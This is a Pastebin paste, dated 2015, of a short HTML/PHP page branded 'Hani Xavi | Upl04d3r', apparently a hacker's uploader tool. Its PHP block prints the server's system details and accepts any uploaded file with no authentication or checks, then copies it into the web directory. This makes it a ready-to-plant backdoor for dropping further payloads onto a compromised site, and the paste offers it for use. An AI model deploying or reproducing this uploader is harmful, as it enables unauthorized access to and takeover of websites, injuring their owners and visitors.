HaniXavi

Hani Xavi Uploader

Feb 26th, 2015
1,017
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.42 KB | None | 0 0
  1. <html>
  2. <head>
  3. <title>Hani Xavi | Upl04d3r</title>
  4. <meta http-equiv=Content-Type content=text/html; charset=utf-8 charset=UTF-8>
  5. <style>
  6. * {margin:0;padding:0}
  7. html, body {
  8. margin: auto;
  9. padding: 0px;
  10. min-width: 960px;
  11. background: #161616 url(https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-xap1/v/t1.0-9/10686970_815004835199767_2832798233243574541_n.jpg?oh=0e5a1d41872e06e662cb2fcf9f8fc1aa&oe=54944767&__gda__=1422122683_7d48e581f3ce512bc63641ad7756b08b) repeat;
  12. color: #FFFFFF;
  13. text-shadow: 2px 0px 1px #000;
  14. font-family:"tahoma", Times, serif;
  15. font-style:bold;
  16. font-size: 10pt;
  17. text-align:center;
  18. min-height:468px;/* for good browsers*/
  19. min-width:552px;/* for good browsers*/
  20. }
  21.  
  22. input, select, textarea ,button{
  23. outline: none;
  24. cursor: pointer;
  25. margin: 0px;
  26. opacity:1;
  27. }
  28. ol, ul, li, h1, h2, h3, h4 {
  29. margin: auto;
  30. padding: 0px;
  31. list-style: none;
  32. list-style-position: inside;
  33. }
  34. h5 { font-size: 25pt;
  35. color:#FFFFFF;
  36. }
  37. h6 { font: regular 8pt;
  38. font-family:tahoma;
  39. color: #FFFFFF;
  40. }
  41. h2 { font: regular 22pt;
  42. font-family:tahoma;
  43. color: #FFFFFF;
  44. }
  45. img { border: none; }
  46. input[type=text], textarea, select, input[type=password] ,button{
  47. border: 5px #0e0e0e solid;
  48. background: #000;
  49. color: #666;
  50. margin: auto;
  51. padding: auto;
  52. font-family: Tahoma;
  53. font-size: 12px;
  54. border-radius: 5px;
  55. -moz-border-radius:5px;
  56. -webkit-border-radius: 5px;
  57. -khtml-border-radius: 5px;
  58. opacity:0.7;
  59. filter:alpha(opacity=90);
  60. }
  61. input[type=submit], .button, input[type=reset], button {
  62. background: #FFFFFF ;
  63. color: #000;
  64. font-family: Tahoma;
  65. font-size: 12px;
  66. margin: auto;
  67. opacity:1;
  68. filter:alpha(opacity=90);
  69. padding: 5px 8px !important;
  70. border: none !important;
  71. border-radius: 5px;
  72. -moz-border-radius:5px;
  73. -webkit-border-radius: 5px;
  74. -khtml-border-radius: 5px;
  75. }
  76. </style>
  77. <body>
  78. </center>
  79. <p><b>Hani Xavi <span lang="ar-ma">|</span> Upl04d3r</b></p>
  80.  
  81. <?php
  82. echo '<b><br><br>'.php_uname().'<br></b>';
  83. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  84. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  85. if( $_POST['_upl'] == "Upload" ) {
  86. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Uploaded Successfully</b><br><br>'; }
  87. else { echo '<b>Upload Failed! </b><br><br>'; }
  88. }
  89. ?></p>
  90. </body>
  91. <!--
  92. Hani Xavi
  93. -->
  94. </html>
Advertisement
Add Comment
Please, Sign In to add comment